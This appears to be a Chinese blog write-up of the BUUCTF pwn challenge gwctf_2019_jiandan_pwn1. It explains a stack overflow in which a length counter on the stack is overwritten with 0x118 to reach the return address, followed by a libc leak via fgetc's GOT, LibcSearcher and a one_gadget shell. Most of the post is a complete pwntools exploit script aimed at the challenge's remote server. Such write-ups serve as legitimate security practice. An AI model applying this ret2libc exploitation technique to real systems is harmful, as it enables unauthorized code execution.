BUU-gwctf_2019_jiandan_pwn1-WP

chuj

2020 年 12 月 01 日

1041 次浏览

暂无评论

3590字数

CTF-WP

<p>这道题目确实是比较简单的一道题，仅仅是要在输入的时候注意一下就可以了。</p>

<p>这里相当于是自己实现了一个gets，但是记录当前长度的变量也存在当前栈帧中，并且我们在进行读入的时候，如果想实现栈溢出，就不得不覆盖这个变量，这样的话就无法正常寻址了，所以我们需要在输入到v4这个变量时注意覆盖的值，我这里直接修改v4的值为0x118，这样就可以直接覆盖return address了。这样我们就可以泄露某个libc的函数的got，然后就可以通过LibcSearcher找出对应的libc，然后使用one_gadget来直接获得shell。</p>

<p>找出来一大堆符合条件的，但是只有这个是只有一个amd64后缀的，那就它了。</p>

<p>奇怪的是第一个gadget是不能用的，不知道为什么，然后我试了一下最后一个，拿到了shell，所以最后的exp</p>

<pre class="wp-block-code"><code>from pwn import *                                                                  
from LibcSearcher import *                                                         
context(log_level = 'debug',os = 'linux',arch = 'amd64')                           
                                                                                   
#sh = process("./jiandan_pwn")                                                     
sh = remote("node3.buuoj.cn","28570")                                              
elf = ELF("./jiandan_pwn")                                                         
#puts_plt = elf.symbols["puts"]                                                    
call_puts = 0x4007BF                                                               
fgetc_got = elf.got["fgetc"]                                                       
pop_rdi = 0x0000000000400843                                                       
                                                                                   
sh.recvuntil("Hack 4 fun!\n")                                                      
#payload = 'a'*0x110 + 'b'*8 + p64(pop_rdi) + p64(fgetc_got) + p64(call_puts) + 'a'  
payload = 'a'*(0x110 - 0x4) + '\x18' + p64(pop_rdi) + p64(fgetc_got) + p64(call_puts)
sh.sendline(payload)                                                               
                                                                                   
data = ''                                                                          
last = ''                                                                          
while True:                                                                        
    now = sh.recv(numb = 1,timeout = 0.01)                                         
    if last == '\n' and now == '':                                                 
    ┊   data = data[:-1] + '\x00'                                                  
    ┊   break                                                                      
    else:                                                                          
    ┊   data = data + now                                                          
    ┊   last = now                                                                 
fgetc_addr = u64(data.ljust(8,'\x00'))                                             
print hex(fgetc_addr)                                                              
libc = LibcSearcher('fgetc',fgetc_addr)                                            
libcbase = fgetc_addr - libc.dump('fgetc')                                         
print hex(libcbase)                                                                
                                                                                   
execv_addr = libcbase + 0xf1147 #one_gadget                                        
payload = 'a'*(0x110 - 0x4) + '\x18' + p64(execv_addr)                             
sh.sendline(payload)                                                               
                                                                                   
sh.interactive()                                                                     </code></pre>

最后修改：2021 年 03 月 30 日